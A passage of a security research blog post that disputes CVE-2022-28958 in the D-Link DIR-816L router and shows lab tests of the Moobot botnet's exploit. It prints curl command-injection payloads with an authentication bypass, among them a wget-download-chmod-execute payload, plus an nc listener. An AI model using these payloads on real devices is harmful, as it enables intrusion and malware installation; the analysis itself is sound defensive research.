",[1373,113413,183],{"class":1387},[1373,113415,59],{"class":1397},[1373,113417,4644],{"class":1383},[1373,113419,113420],{"class":4640},"GETCFG_SVC",[1373,113422,4680],{"class":1383},[1373,113424,113425,113427,113429,113431,113433,113435],{"class":1375,"line":6781},[1373,113426,9793],{"class":4636},[1373,113428,47425],{"class":1383},[1373,113430,113420],{"class":4640},[1373,113432,15677],{"class":1397},[1373,113434,7083],{"class":1387},[1373,113436,11875],{"class":1383},[1373,113438,113439],{"class":1375,"line":7524},[1373,113440,9814],{"class":1383},[1373,113442,113443,113445,113447,113449,113451,113454,113456,113458,113460,113462,113464,113466,113469,113471],{"class":1375,"line":7530},[1373,113444,9819],{"class":1383},[1373,113446,94251],{"class":4640},[1373,113448,5417],{"class":1397},[1373,113450,4883],{"class":1387},[1373,113452,113453],{"class":1391},"\u002Fhtdocs\u002Fwebinc\u002Fgetcfg\u002F",[1373,113455,183],{"class":1387},[1373,113457,59],{"class":1397},[1373,113459,4644],{"class":1383},[1373,113461,113420],{"class":4640},[1373,113463,59],{"class":1397},[1373,113465,183],{"class":1387},[1373,113467,113468],{"class":1391},".xml.php",[1373,113470,183],{"class":1387},[1373,113472,4912],{"class":1383},[1373,113474,113475],{"class":1375,"line":7546},[1373,113476,113477],{"class":4630},"                \u002F* GETCFG_SVC will be passed to the child process. 
*\u002F\n",[1373,113479,113480,113482,113484,113487,113489,113491,113493,113495,113497,113499,113501],{"class":1375,"line":7571},[1373,113481,18293],{"class":4636},[1373,113483,4641],{"class":1383},[1373,113485,113486],{"class":7297},"isfile",[1373,113488,34467],{"class":1383},[1373,113490,85692],{"class":4640},[1373,113492,2230],{"class":1383},[1373,113494,15920],{"class":1397},[1373,113496,183],{"class":1387},[1373,113498,467],{"class":1391},[1373,113500,183],{"class":1387},[1373,113502,11875],{"class":1383},[1373,113504,113505],{"class":1375,"line":7598},[1373,113506,15802],{"class":1383},[1373,113508,113509,113512,113514,113516,113518,113520,113523,113525],{"class":1375,"line":7615},[1373,113510,113511],{"class":7297},"                        AES_Encrypt_DBnode",[1373,113513,34467],{"class":1383},[1373,113515,113420],{"class":4640},[1373,113517,5437],{"class":1383},[1373,113519,4883],{"class":1387},[1373,113521,113522],{"class":1391},"Encrypt",[1373,113524,183],{"class":1387},[1373,113526,4680],{"class":1383},[1373,113528,113529,113532,113534,113536,113538,113540,113542,113544,113546],{"class":1375,"line":7635},[1373,113530,113531],{"class":7297},"                        
dophp",[1373,113533,1384],{"class":1383},[1373,113535,183],{"class":1387},[1373,113537,75722],{"class":1391},[1373,113539,183],{"class":1387},[1373,113541,5437],{"class":1383},[1373,113543,4656],{"class":1383},[1373,113545,85692],{"class":4640},[1373,113547,4680],{"class":1383},[1373,113549,113550,113552,113554,113556,113558,113560,113563,113565],{"class":1375,"line":7640},[1373,113551,113511],{"class":7297},[1373,113553,34467],{"class":1383},[1373,113555,113420],{"class":4640},[1373,113557,5437],{"class":1383},[1373,113559,4883],{"class":1387},[1373,113561,113562],{"class":1391},"Decrypt",[1373,113564,183],{"class":1387},[1373,113566,4680],{"class":1383},[1373,113568,113569],{"class":1375,"line":7648},[1373,113570,18320],{"class":1383},[1373,113572,113573],{"class":1375,"line":7672},[1373,113574,9832],{"class":1383},[1373,113576,113577,113579,113581,113583],{"class":1375,"line":7688},[1373,113578,47435],{"class":1383},[1373,113580,113374],{"class":4640},[1373,113582,94006],{"class":1397},[1373,113584,4912],{"class":1383},[1373,113586,113587],{"class":1375,"line":7709},[1373,113588,9861],{"class":1383},[1373,113590,113591],{"class":1375,"line":7714},[1373,113592,4795],{"class":1383},[1373,113594,113595],{"class":1375,"line":7722},[1373,113596,1855],{"class":1383},[18,113598,113599,113600,113603],{},"After reading the above code, it’s obvious the researcher's proof of concept is useless. It doesn’t touch the endpoint where the vulnerable code allegedly resides, and the endpoint it does reach doesn’t do anything with the provided parameters. It’s amusing that, apparently, the Moobot developers copied the researcher’s mistake. 
Pictured below, from Unit 42's ",[47,113601,11046],{"href":112596,"rel":113602},[51],", is Moobot's implementation of CVE-2022-28958 as seen via Wireshark:",[18,113605,113606],{},[68,113607],{":width":10862,"alt":112689,"src":113608},"\u002Fblog\u002Fmoobot-uses-fake-vulnerability\u002Fmoobot_exploit.png",[18,113610,113611,113612,113614,113615,982,113617,113619,113620,113622,113623,1554,113625,113627],{},"Above, Moobot sends an HTTP POST request to ",[886,113613,113046],{}," using both the ",[886,113616,100044],{},[886,113618,85021],{}," parameters just as the researcher’s incorrect proof of concept did. As we've seen, ",[886,113621,113046],{}," doesn't handle ",[886,113624,100044],{},[886,113626,85021],{},". Moobot's exploit doesn’t work.",[18,113629,113630,113631,39227,113634,113637,113638,113640,113641,113644,113645,113648,113649,113652],{},"If the screenshot can be trusted, the Moobot developers also encoded the payload incorrectly. By using ",[886,113632,113633],{},"value=&",[886,113635,113636],{},"value=%26",", they've messed up the (assumed) command injection and simply set ",[886,113639,85021],{}," to an empty string. Also, the authentication bypass at the end (",[886,113642,113643],{},"AUTHORIZED_GROUP=1"," aka CVE-2022-28956, CVE-2020-15894, CVE-2020-9376, CVE-2019-17506, and CVE-2018-7034) ",[295,113646,113647],{},"has to"," start with ",[886,113650,113651],{},"%0a"," to work, which isn't the case here.",[18,113654,113655,113656,113658],{},"Either way, the exploit can't work because it's hitting the wrong endpoint. Which is interesting, but that doesn't mean ",[886,113657,112717],{}," isn't exploitable. Let’s do some testing to prove that CVE-2022-28958 doesn’t exist!",[1920,113660,113662],{"id":113661},"local-testing-of-a-d-link-dir-816l","Local Testing of a D-Link DIR-816L",[18,113664,113665,113666,4606],{},"The affected DIR-816L is end-of-life, but it was easy to find one on eBay. 
Fortunately, the affected firmware, 2.06.B01, is also available on D-Link’s legacy ",[47,113667,113670],{"href":113668,"rel":113669},"http:\u002F\u002Flegacyfiles.us.dlink.com\u002FDIR-816L\u002FREVB\u002FSECURITY_PATCHES\u002F",[51],"files archive",[18,113672,113673],{},[68,113674],{":width":10862,"alt":112689,"src":113675},"\u002Fblog\u002Fmoobot-uses-fake-vulnerability\u002Flegacy_files.png",[18,113677,113678],{},"So we had everything needed to test the device in a local lab setup. We started testing by throwing the researcher’s original proof of concept at the device.",[100588,113680,113681],{},[1354,113682,113684],{"className":31740,"code":113683,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~$ curl -d \"action=sethostname&value=%26%20ls%20-la%20%26%0aAUTHORIZED_GROUP=1\" http:\u002F\u002F192.168.0.1:80\u002Fgetcfg.php\n",[886,113685,113686],{"__ignoreMap":219},[1373,113687,113688,113690,113692,113694,113696,113698,113700],{"class":1375,"line":1376},[1373,113689,55482],{"class":2206},[1373,113691,2222],{"class":1391},[1373,113693,87473],{"class":2209},[1373,113695,4883],{"class":1387},[1373,113697,113025],{"class":1391},[1373,113699,183],{"class":1387},[1373,113701,113702],{"class":1391}," http:\u002F\u002F192.168.0.1:80\u002Fgetcfg.php\n",[1354,113704,113706],{"className":56326,"code":113705,"language":56328,"meta":219,"style":219},"\u003C?xml version=\"1.0\" 
encoding=\"utf-8\"?>\n\u003Cpostxml>\n\u003C\u002Fpostxml>\n",[886,113707,113708,113737,113746],{"__ignoreMap":219},[1373,113709,113710,113712,113714,113716,113718,113720,113722,113724,113726,113728,113730,113732,113734],{"class":1375,"line":1376},[1373,113711,2323],{"class":1383},[1373,113713,56328],{"class":6300},[1373,113715,45880],{"class":8252},[1373,113717,5417],{"class":1383},[1373,113719,183],{"class":1387},[1373,113721,84878],{"class":1391},[1373,113723,183],{"class":1387},[1373,113725,84883],{"class":8252},[1373,113727,5417],{"class":1383},[1373,113729,183],{"class":1387},[1373,113731,48993],{"class":1391},[1373,113733,183],{"class":1387},[1373,113735,113736],{"class":1383},"?>\n",[1373,113738,113739,113741,113744],{"class":1375,"line":220},[1373,113740,11852],{"class":1383},[1373,113742,113743],{"class":6300},"postxml",[1373,113745,6765],{"class":1383},[1373,113747,113748,113750,113752],{"class":1375,"line":1266},[1373,113749,46627],{"class":1383},[1373,113751,113743],{"class":6300},[1373,113753,6765],{"class":1383},[18,113755,113756,113757,113760],{},"Underwhelming to say the least. No indication that ",[886,113758,113759],{},"& ls -l &"," was executed. 
So we tried the Moobot payload.",[100588,113762,113763],{},[1354,113764,113766],{"className":31740,"code":113765,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~$ curl -d \"action=sethostname&value=& wget http:\u002F\u002F192.168.0.164\u002Ftest; chmod 777 test; .\u002Ftest & AUTHORIZED_GROUP=1\" http:\u002F\u002F192.168.0.1:80\u002Fgetcfg.php\n",[886,113767,113768],{"__ignoreMap":219},[1373,113769,113770,113772,113774,113776,113778,113781,113783],{"class":1375,"line":1376},[1373,113771,55482],{"class":2206},[1373,113773,2222],{"class":1391},[1373,113775,87473],{"class":2209},[1373,113777,4883],{"class":1387},[1373,113779,113780],{"class":1391},"action=sethostname&value=& wget http:\u002F\u002F192.168.0.164\u002Ftest; chmod 777 test; .\u002Ftest & AUTHORIZED_GROUP=1",[1373,113782,183],{"class":1387},[1373,113784,113702],{"class":1391},[1354,113786,113788],{"className":56326,"code":113787,"language":56328,"meta":219,"style":219},"\u003C?xml version=\"1.0\" encoding=\"utf-8\"?>\n\u003Cpostxml>\n    \u003Cresult>FAILED\u003C\u002Fresult>\n    \u003Cmessage>Not 
authorized\u003C\u002Fmessage>\n\u003C\u002Fpostxml>\n",[886,113789,113790,113818,113826,113843,113861],{"__ignoreMap":219},[1373,113791,113792,113794,113796,113798,113800,113802,113804,113806,113808,113810,113812,113814,113816],{"class":1375,"line":1376},[1373,113793,2323],{"class":1383},[1373,113795,56328],{"class":6300},[1373,113797,45880],{"class":8252},[1373,113799,5417],{"class":1383},[1373,113801,183],{"class":1387},[1373,113803,84878],{"class":1391},[1373,113805,183],{"class":1387},[1373,113807,84883],{"class":8252},[1373,113809,5417],{"class":1383},[1373,113811,183],{"class":1387},[1373,113813,48993],{"class":1391},[1373,113815,183],{"class":1387},[1373,113817,113736],{"class":1383},[1373,113819,113820,113822,113824],{"class":1375,"line":220},[1373,113821,11852],{"class":1383},[1373,113823,113743],{"class":6300},[1373,113825,6765],{"class":1383},[1373,113827,113828,113830,113832,113834,113837,113839,113841],{"class":1375,"line":1266},[1373,113829,8246],{"class":1383},[1373,113831,17636],{"class":6300},[1373,113833,5384],{"class":1383},[1373,113835,113836],{"class":4640},"FAILED",[1373,113838,46627],{"class":1383},[1373,113840,17636],{"class":6300},[1373,113842,6765],{"class":1383},[1373,113844,113845,113847,113850,113852,113855,113857,113859],{"class":1375,"line":1852},[1373,113846,8246],{"class":1383},[1373,113848,113849],{"class":6300},"message",[1373,113851,5384],{"class":1383},[1373,113853,113854],{"class":4640},"Not authorized",[1373,113856,46627],{"class":1383},[1373,113858,113849],{"class":6300},[1373,113860,6765],{"class":1383},[1373,113862,113863,113865,113867],{"class":1375,"line":4692},[1373,113864,46627],{"class":1383},[1373,113866,113743],{"class":6300},[1373,113868,6765],{"class":1383},[18,113870,113871],{},"We received a “Not authorized” response because the authorization bypass didn’t work, as we predicted earlier in the blog. Without a working bypass, the attacker needs to be authenticated to the device. 
This is a fairly important detail that NIST overlooked when assigning CVE-2022-28958 a CVSSv3 score of 9.8. CISA, presumably, also overlooked this when they added CVE-2022–28958 to the KEV Catalog but not CVE-2022–28956.",[18,113873,113874],{},"If we fix Moobot's exploit to use the bypass correctly, fix the (assumed) command injection, and simplify the payload then we get this:",[100588,113876,113877],{},[1354,113878,113880],{"className":31740,"code":113879,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~$ curl -d \"action=sethostname&value=%26%20wget%20http:\u002F\u002F192.168.0.164\u002Ftest%20%26%0aAUTHORIZED_GROUP=ok\" http:\u002F\u002F192.168.0.1:80\u002Fgetcfg.php\n",[886,113881,113882],{"__ignoreMap":219},[1373,113883,113884,113886,113888,113890,113892,113895,113897],{"class":1375,"line":1376},[1373,113885,55482],{"class":2206},[1373,113887,2222],{"class":1391},[1373,113889,87473],{"class":2209},[1373,113891,4883],{"class":1387},[1373,113893,113894],{"class":1391},"action=sethostname&value=%26%20wget%20http:\u002F\u002F192.168.0.164\u002Ftest%20%26%0aAUTHORIZED_GROUP=ok",[1373,113896,183],{"class":1387},[1373,113898,113702],{"class":1391},[1354,113900,113901],{"className":56326,"code":113705,"language":56328,"meta":219,"style":219},[886,113902,113903,113931,113939],{"__ignoreMap":219},[1373,113904,113905,113907,113909,113911,113913,113915,113917,113919,113921,113923,113925,113927,113929],{"class":1375,"line":1376},[1373,113906,2323],{"class":1383},[1373,113908,56328],{"class":6300},[1373,113910,45880],{"class":8252},[1373,113912,5417],{"class":1383},[1373,113914,183],{"class":1387},[1373,113916,84878],{"class":1391},[1373,113918,183],{"class":1387},[1373,113920,84883],{"class":8252},[1373,113922,5417],{"class":1383},[1373,113924,183],{"class":1387},[1373,113926,48993],{"class":1391},[1373,113928,183],{"class":1387},[1373,113930,113736],{"class":1383},[1373,113932,113933,113935,113937],{"class":1375,"line":220},[1373,113934,11852],{"class":13
83},[1373,113936,113743],{"class":6300},[1373,113938,6765],{"class":1383},[1373,113940,113941,113943,113945],{"class":1375,"line":1266},[1373,113942,46627],{"class":1383},[1373,113944,113743],{"class":6300},[1373,113946,6765],{"class":1383},[18,113948,113949,113950,113952,113953,113955,113956,113958],{},"Now, in this case, we had ",[886,113951,30202],{}," listening for a ",[886,113954,1553],{}," callback on 192.168.0.164, and we do know that ",[886,113957,1553],{}," is present on the DIR-816L. But, again, we get nothing from the device:",[100588,113960,113961],{},[1354,113962,113964],{"className":31740,"code":113963,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~$ sudo nc -lvnp 80\n[sudo] password for albinolobster:\nListening on 0.0.0.0 80\n",[886,113965,113966,113981,113997],{"__ignoreMap":219},[1373,113967,113968,113970,113972,113975,113978],{"class":1375,"line":1376},[1373,113969,55482],{"class":2206},[1373,113971,17747],{"class":1391},[1373,113973,113974],{"class":1391}," nc",[1373,113976,113977],{"class":2209}," -lvnp",[1373,113979,113980],{"class":5467}," 80\n",[1373,113982,113983,113985,113988,113990,113992,113994],{"class":1375,"line":220},[1373,113984,7035],{"class":1383},[1373,113986,113987],{"class":4640},"sudo",[1373,113989,15050],{"class":1383},[1373,113991,108800],{"class":4640},[1373,113993,98551],{"class":4636},[1373,113995,113996],{"class":4640}," albinolobster:\n",[1373,113998,113999,114002,114004,114007],{"class":1375,"line":1266},[1373,114000,114001],{"class":2206},"Listening",[1373,114003,98466],{"class":1391},[1373,114005,114006],{"class":5467}," 0.0.0.0",[1373,114008,113980],{"class":5467},[18,114010,114011,114012,114014,114015,114017,114018,114020,114021,4606],{},"But remember, we didn't expect any of that to work anyway. We already knew ",[886,114013,113046],{}," is the wrong endpoint. We only tested the original researcher's proof of concept to be thorough. 
What we really want to know is if ",[886,114016,112717],{}," is exploitable as the original writeup and CVE description suggest. Let’s try the previous ",[886,114019,1553],{}," payload, but this time pointed at ",[886,114022,112717],{},[100588,114024,114025],{},[1354,114026,114028],{"className":31740,"code":114027,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~$ curl -d \"action=sethostname&value=%26%20wget%20http:\u002F\u002F192.168.0.164\u002Ftest%20%26%0aAUTHORIZED_GROUP=ok\" http:\u002F\u002F192.168.0.1:80\u002Fshareport.php\n",[886,114029,114030],{"__ignoreMap":219},[1373,114031,114032,114034,114036,114038,114040,114042,114044],{"class":1375,"line":1376},[1373,114033,55482],{"class":2206},[1373,114035,2222],{"class":1391},[1373,114037,87473],{"class":2209},[1373,114039,4883],{"class":1387},[1373,114041,113894],{"class":1391},[1373,114043,183],{"class":1387},[1373,114045,114046],{"class":1391}," http:\u002F\u002F192.168.0.1:80\u002Fshareport.php\n",[1354,114048,114050],{"className":56326,"code":114049,"language":56328,"meta":219,"style":219},"\u003C?xml version=\"1.0\" encoding=\"utf-8\"?>\n\u003Cshareportreport>\n    \u003Caction>sethostname\u003C\u002Faction>\n    \u003Cresult>OK\u003C\u002Fresult>\n    
\u003Creason>\u003C\u002Freason>\n\u003C\u002Fshareportreport>\n",[886,114051,114052,114080,114089,114105,114121,114134],{"__ignoreMap":219},[1373,114053,114054,114056,114058,114060,114062,114064,114066,114068,114070,114072,114074,114076,114078],{"class":1375,"line":1376},[1373,114055,2323],{"class":1383},[1373,114057,56328],{"class":6300},[1373,114059,45880],{"class":8252},[1373,114061,5417],{"class":1383},[1373,114063,183],{"class":1387},[1373,114065,84878],{"class":1391},[1373,114067,183],{"class":1387},[1373,114069,84883],{"class":8252},[1373,114071,5417],{"class":1383},[1373,114073,183],{"class":1387},[1373,114075,48993],{"class":1391},[1373,114077,183],{"class":1387},[1373,114079,113736],{"class":1383},[1373,114081,114082,114084,114087],{"class":1375,"line":220},[1373,114083,11852],{"class":1383},[1373,114085,114086],{"class":6300},"shareportreport",[1373,114088,6765],{"class":1383},[1373,114090,114091,114093,114095,114097,114099,114101,114103],{"class":1375,"line":1266},[1373,114092,8246],{"class":1383},[1373,114094,100044],{"class":6300},[1373,114096,5384],{"class":1383},[1373,114098,112819],{"class":4640},[1373,114100,46627],{"class":1383},[1373,114102,100044],{"class":6300},[1373,114104,6765],{"class":1383},[1373,114106,114107,114109,114111,114113,114115,114117,114119],{"class":1375,"line":1852},[1373,114108,8246],{"class":1383},[1373,114110,17636],{"class":6300},[1373,114112,5384],{"class":1383},[1373,114114,112919],{"class":4640},[1373,114116,46627],{"class":1383},[1373,114118,17636],{"class":6300},[1373,114120,6765],{"class":1383},[1373,114122,114123,114125,114128,114130,114132],{"class":1375,"line":4692},[1373,114124,8246],{"class":1383},[1373,114126,114127],{"class":6300},"reason",[1373,114129,49120],{"class":1383},[1373,114131,114127],{"class":6300},[1373,114133,6765],{"class":1383},[1373,114135,114136,114138,114140],{"class":1375,"line":4724},[1373,114137,46627],{"class":1383},[1373,114139,114086],{"class":6300},[1373,114141,6765],{"class":1383},[18
,114143,114144,114145,114147,114148,114150,114151,114153],{},"A new response! But still no ",[886,114146,1553],{}," request to our listening ",[886,114149,30202],{}," on port 80. Maybe the researcher’s original ",[886,114152,113039],{}," payload will yield a result?",[100588,114155,114156],{},[1354,114157,114159],{"className":31740,"code":114158,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~$ curl -d \"action=sethostname&value=%26%20ls%20-l%20%26%0aAUTHORIZED_GROUP=ok\" http:\u002F\u002F192.168.0.1:80\u002Fshareport.php\n",[886,114160,114161],{"__ignoreMap":219},[1373,114162,114163,114165,114167,114169,114171,114174,114176],{"class":1375,"line":1376},[1373,114164,55482],{"class":2206},[1373,114166,2222],{"class":1391},[1373,114168,87473],{"class":2209},[1373,114170,4883],{"class":1387},[1373,114172,114173],{"class":1391},"action=sethostname&value=%26%20ls%20-l%20%26%0aAUTHORIZED_GROUP=ok",[1373,114175,183],{"class":1387},[1373,114177,114046],{"class":1391},[1354,114179,114180],{"className":56326,"code":114049,"language":56328,"meta":219,"style":219},[886,114181,114182,114210,114218,114234,114250,114262],{"__ignoreMap":219},[1373,114183,114184,114186,114188,114190,114192,114194,114196,114198,114200,114202,114204,114206,114208],{"class":1375,"line":1376},[1373,114185,2323],{"class":1383},[1373,114187,56328],{"class":6300},[1373,114189,45880],{"class":8252},[1373,114191,5417],{"class":1383},[1373,114193,183],{"class":1387},[1373,114195,84878],{"class":1391},[1373,114197,183],{"class":1387},[1373,114199,84883],{"class":8252},[1373,114201,5417],{"class":1383},[1373,114203,183],{"class":1387},[1373,114205,48993],{"class":1391},[1373,114207,183],{"class":1387},[1373,114209,113736],{"class":1383},[1373,114211,114212,114214,114216],{"class":1375,"line":220},[1373,114213,11852],{"class":1383},[1373,114215,114086],{"class":6300},[1373,114217,6765],{"class":1383},[1373,114219,114220,114222,114224,114226,114228,114230,114232],{"class":1375,"line":1266},[1373,
114221,8246],{"class":1383},[1373,114223,100044],{"class":6300},[1373,114225,5384],{"class":1383},[1373,114227,112819],{"class":4640},[1373,114229,46627],{"class":1383},[1373,114231,100044],{"class":6300},[1373,114233,6765],{"class":1383},[1373,114235,114236,114238,114240,114242,114244,114246,114248],{"class":1375,"line":1852},[1373,114237,8246],{"class":1383},[1373,114239,17636],{"class":6300},[1373,114241,5384],{"class":1383},[1373,114243,112919],{"class":4640},[1373,114245,46627],{"class":1383},[1373,114247,17636],{"class":6300},[1373,114249,6765],{"class":1383},[1373,114251,114252,114254,114256,114258,114260],{"class":1375,"line":4692},[1373,114253,8246],{"class":1383},[1373,114255,114127],{"class":6300},[1373,114257,49120],{"class":1383},[1373,114259,114127],{"class":6300},[1373,114261,6765],{"class":1383},[1373,114263,114264,114266,114268],{"class":1375,"line":4724},[1373,114265,46627],{"class":1383},[1373,114267,114086],{"class":6300},[1373,114269,6765],{"class":1383},[18,114271,114272,114273,114275],{},"Again, no proof the exploit was successful. Perhaps exploitation is blind? If that's the case, why provide a proof of concept using ",[886,114274,113039],{},"? Maybe the proof of concept messed up the shell metacharacters? A single ampersand is an odd choice. We fiddled with the metacharacters and tested all these exploits against firmware versions: 2.03b1, 2.06b1 (the reportedly vulnerable version), and 2.06b09 Beta. The \"exploits\" didn't work on any of these firmware. But why?",[1920,114277,114279],{"id":114278},"cve-2022-28958-not-a-real-vulnerability","CVE-2022-28958: Not a Real Vulnerability",[18,114281,114282,114283,114285,114286],{},"Let's return to the researcher's original claim. 
They state the following code in ",[886,114284,112717],{}," does not have ",[1131,114287,114288],{},"\"enough filter with parameter ‘value’, it just passed to function set which execute command directly.\"",[1354,114290,114292],{"className":1367,"code":114291,"language":1369,"meta":219,"style":219},"set(\"\u002Fdevice\u002Fgw_name\", $value);\n",[886,114293,114294],{"__ignoreMap":219},[1373,114295,114296,114298,114300,114302,114304,114306,114308,114310,114312],{"class":1375,"line":1376},[1373,114297,86867],{"class":7297},[1373,114299,1384],{"class":1383},[1373,114301,183],{"class":1387},[1373,114303,112879],{"class":1391},[1373,114305,183],{"class":1387},[1373,114307,5437],{"class":1383},[1373,114309,4656],{"class":1383},[1373,114311,85021],{"class":4640},[1373,114313,4680],{"class":1383},[18,114315,114316,114317,114319,114320,114323,114324,114326,114327,20559,114329,114331,114332,114334,114335,10515,114337,114340],{},"The claim that ",[886,114318,112981],{}," will ",[1131,114321,114322],{},"\"execute command directly\""," is what needs to be examined. It would seem the researcher thinks ",[886,114325,112981],{}," will execute ",[886,114328,112879],{},[886,114330,112992],{}," as some type of parameter. However, after looking at the firmware's code, we know ",[886,114333,112879],{}," isn't a binary and ",[886,114336,112981],{},[1131,114338,114339],{},"doesn't"," execute commands.",[18,114342,114343,114344,1554,114346,114348,114349,114351,114352,114354,114355,14193,114358,114360,114361,114364,114365,1246,114367,1246,114370,1255,114373,114376,114377,114380,114381,27987],{},"Execution of PHP files like ",[886,114345,113046],{},[886,114347,112717],{}," on the DIR-816L is a bit opaque. 
The files are served via the ",[886,114350,92999],{}," binary, but it passes execution of ",[886,114353,1369],{}," files to a binary called ",[886,114356,114357],{},"cgibin",[886,114359,114357],{}," passes execution to a binary called ",[886,114362,114363],{},"xmldb",", which has a custom PHP interpreter. Exactly how custom, we're not sure, but they've added a few builtins like ",[886,114366,112981],{},[886,114368,114369],{},"setattr()",[886,114371,114372],{},"event()",[886,114374,114375],{},"query()",". These extra builtins are for interacting with the ",[1131,114378,114379],{},"xml database"," (hence the binary's name, ",[886,114382,114363],{},[18,114384,114385,114386,114389,114390,114392,114393,114395,114396,114399,114400,114402],{},"The xml database contains the router's configuration. When the user calls ",[886,114387,114388],{},"set(\"\u002Fdevice\u002Fgw_name\", $value)",", they are inserting ",[886,114391,112992],{}," into the ",[886,114394,112879],{}," entry in the xml database. If you root the device, you’ll find you can examine the database from the device's command line using the ",[886,114397,114398],{},"xmldbc"," (xml db client) binary. 
In the following example, we list the contents of ",[886,114401,112879],{}," in the xml database of a DIR-816L we had just “exploited.”",[1354,114404,114406],{"className":31740,"code":114405,"language":2186,"meta":219,"style":219},"# xmldbc -g \u002Fdevice\u002Fgw_name\n& wget http:\u002F\u002F192.168.0.164\u002Ftest &\n# xmldbc -d \u002Ftmp\u002Fconfig.xml\n# cat \u002Ftmp\u002Fconfig.xml | grep gw_name\n\u003Cgw_name>&amp; wget http:\u002F\u002F192.168.0.164\u002Ftest &amp; \u003C\u002Fgw_name>\n",[886,114407,114408,114413,114425,114430,114435],{"__ignoreMap":219},[1373,114409,114410],{"class":1375,"line":1376},[1373,114411,114412],{"class":4630},"# xmldbc -g \u002Fdevice\u002Fgw_name\n",[1373,114414,114415,114417,114419,114422],{"class":1375,"line":220},[1373,114416,7218],{"class":1383},[1373,114418,39700],{"class":2206},[1373,114420,114421],{"class":1391}," http:\u002F\u002F192.168.0.164\u002Ftest",[1373,114423,114424],{"class":1383}," &\n",[1373,114426,114427],{"class":1375,"line":1266},[1373,114428,114429],{"class":4630},"# xmldbc -d \u002Ftmp\u002Fconfig.xml\n",[1373,114431,114432],{"class":1375,"line":1852},[1373,114433,114434],{"class":4630},"# cat \u002Ftmp\u002Fconfig.xml | grep gw_name\n",[1373,114436,114437,114439,114442,114445,114448,114450,114452,114454,114456,114458,114460,114462,114465],{"class":1375,"line":4692},[1373,114438,11852],{"class":1397},[1373,114440,114441],{"class":4640},"gw_name",[1373,114443,114444],{"class":1397},">&",[1373,114446,114447],{"class":2206},"amp",[1373,114449,39663],{"class":1383},[1373,114451,39700],{"class":2206},[1373,114453,114421],{"class":1391},[1373,114455,87587],{"class":1383},[1373,114457,114447],{"class":2206},[1373,114459,39663],{"class":1383},[1373,114461,27250],{"class":1397},[1373,114463,114464],{"class":2206},"\u002Fgw_name",[1373,114466,6765],{"class":4640},[18,114468,114469,114470,114472,114473,114475,114476,114478,114479,114481,114482,114484],{},"Here you can see our malicious ",[886,114471,1553],{}," 
was inserted into the database, just as we said. The shell metacharacters were even encoded properly when inserted into the xml. Not only is there no evidence of ",[886,114474,1553],{}," being executed, but it isn't even part of ",[886,114477,112981],{},"'s intended functionality. ",[886,114480,112981],{}," does not execute ",[886,114483,85021],{}," \"directly\", as stated in the disclosure.",[18,114486,114487,114488,114490],{},"Looking deeper with Ghidra, we didn't find any evidence of command execution when tracing the logic from the http server through ",[886,114489,114398],{}," and into the database. It's obviously difficult to prove a negative, especially with so many moving parts. But after testing the exploits, looking at the functionality, and examining where the payload lands, it’s difficult to say the original claims hold up.",[18,114492,114493],{},"However, this vulnerability is in the KEV Catalog so it’s worth looking even deeper. Let’s seek out artifacts left by CVE-2022-28958 “exploitation” on internet-facing devices.",[1920,114495,114497],{"id":114496},"internet-scanning","Internet Scanning",[18,114499,114500,114501,114504,114505,114508,114509,31686],{},"As stated earlier, the researcher’s original proof of concept had ",[886,114502,114503],{},"%0aAUTHORIZED_GROUP=1"," at the end of the payload. This authentication bypass satisfies the ",[886,114506,114507],{},"AUTHORIZED_GROUP"," check in DIR-816L PHP files (including ",[886,114510,112717],{},[1354,114512,114514],{"className":1367,"code":114513,"language":1369,"meta":219,"style":219},"if ($AUTHORIZED_GROUP \u003C 0)\n{\n    $result = \"FAIL\";\n    $reason = i18n(\"Permission deny. 
The user is unauthorized.\");\n}\nelse\n{\n    if ($_POST[\"action\"] == \"sethostname\")\n    {\n        $value = $_POST[\"value\"];\n        if ($value != \"\")\n        {\n            set(\"\u002Fdevice\u002Fgw_name\", $value);\n            event(\"SHAREPORT.SETGWNAME\");\n            $RESULT = \"OK\";\n            $REASON = \"\";                    \n        }\n    }    \n    else    fail(i18n(\"Unknown ACTION!\"));\n}\n?>\n",[886,114515,114516,114530,114534,114550,114570,114574,114578,114582,114610,114614,114636,114650,114654,114674,114688,114704,114718,114722,114728,114748,114752],{"__ignoreMap":219},[1373,114517,114518,114520,114522,114524,114526,114528],{"class":1375,"line":1376},[1373,114519,4637],{"class":4636},[1373,114521,47425],{"class":1383},[1373,114523,112731],{"class":4640},[1373,114525,11852],{"class":1397},[1373,114527,5557],{"class":5467},[1373,114529,11875],{"class":1383},[1373,114531,114532],{"class":1375,"line":220},[1373,114533,8904],{"class":1383},[1373,114535,114536,114538,114540,114542,114544,114546,114548],{"class":1375,"line":1266},[1373,114537,7362],{"class":1383},[1373,114539,100518],{"class":4640},[1373,114541,5417],{"class":1397},[1373,114543,4883],{"class":1387},[1373,114545,112754],{"class":1391},[1373,114547,183],{"class":1387},[1373,114549,4912],{"class":1383},[1373,114551,114552,114554,114556,114558,114560,114562,114564,114566,114568],{"class":1375,"line":1852},[1373,114553,7362],{"class":1383},[1373,114555,112765],{"class":4640},[1373,114557,5417],{"class":1397},[1373,114559,112770],{"class":7297},[1373,114561,1384],{"class":1383},[1373,114563,183],{"class":1387},[1373,114565,112777],{"class":1391},[1373,114567,183],{"class":1387},[1373,114569,4680],{"class":1383},[1373,114571,114572],{"class":1375,"line":4692},[1373,114573,1855],{"class":1383},[1373,114575,114576],{"class":1375,"line":4724},[1373,114577,112790],{"class":4636},[1373,114579,114580],{"class":1375,"line":4756},[1373,114581,8904],{"class":1383},[1373,114583,114584,
